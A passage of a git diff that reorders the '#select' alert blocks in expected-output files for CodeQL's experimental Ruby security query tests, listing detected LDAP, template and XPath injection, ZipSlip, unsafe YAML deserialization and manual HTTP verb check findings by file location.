@@ -1,8 +1,3 @@ -#select -| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | -| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | edges | LdapInjection.rb:5:5:5:6 | dc | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | provenance | AdditionalTaintStep | | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:5:10:5:20 | ...[...] | provenance | | 
@@ -33,3 +28,8 @@ nodes | LdapInjection.rb:37:41:37:44 | name | semmle.label | name | | LdapInjection.rb:38:62:38:67 | filter | semmle.label | filter | subpaths +#select +| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | +| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected index 2355550b9328..cdb6045d4daf 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected 
@@ -1,8 +1,3 @@ -#select -| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | edges | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:8:5:8:12 | bad_text | provenance | | | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:11:11:11:14 | name | provenance | | 
@@ -40,3 +35,8 @@ nodes | SlimInjection.rb:23:23:23:35 | { ... } : [lambda] [captured bad2_text] : String | semmle.label | { ... } : [lambda] [captured bad2_text] : String | | SlimInjection.rb:23:25:23:33 | bad2_text | semmle.label | bad2_text | subpaths +#select +| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected index 369a01c72f02..66ef14da3d7f 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected 
@@ -1,14 +1,3 @@ -#select -| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. 
| RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | edges | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | provenance | AdditionalTaintStep | | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | provenance | AdditionalTaintStep | 
@@ -47,3 +36,14 @@ nodes | RexmlInjection.rb:27:40:27:50 | "//#{...}" | semmle.label | "//#{...}" | | RexmlInjection.rb:35:28:35:38 | "//#{...}" | semmle.label | "//#{...}" | subpaths +#select +| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. 
| NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected index 926568e388d6..65ffe942e84d 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected 
@@ -1,10 +1,3 @@ -#select -| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | -| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | -| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | -| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | -| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | -| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | edges | zip_slip.rb:8:5:8:11 | tarfile | zip_slip.rb:9:5:9:11 | tarfile | provenance | | | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:8:5:8:11 | tarfile | provenance | | 
@@ -78,3 +71,10 @@ nodes | zip_slip.rb:125:22:125:36 | call to full_name | semmle.label | call to full_name | | zip_slip.rb:126:21:126:30 | entry_path | semmle.label | entry_path | subpaths +#select +| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | +| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | +| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | +| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | +| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | +| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected index 0cfb19a43619..0fa5f9158300 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected 
+++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected 
@@ -1,18 +1,3 @@ -#select -| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | edges | UnsafeYamlDeserialization.rb:10:5:10:13 | yaml_data | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | provenance | | | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:10:17:10:28 | ...[...] | provenance | | 
@@ -54,3 +39,18 @@ nodes | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | semmle.label | call to gets | | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | semmle.label | call to readlines | subpaths +#select +| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected index b4dc532a38b3..e0e85b75ebbe 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected 
@@ -1,11 +1,3 @@ -#select -| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. 
Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | -| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | edges | ManuallyCheckHttpVerb.rb:11:5:11:10 | method | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | provenance | | | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:11:14:11:42 | ...[...] | provenance | | 
@@ -40,3 +32,11 @@ nodes | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | semmle.label | call to env | | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | semmle.label | ...[...] | subpaths +#select +| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... 
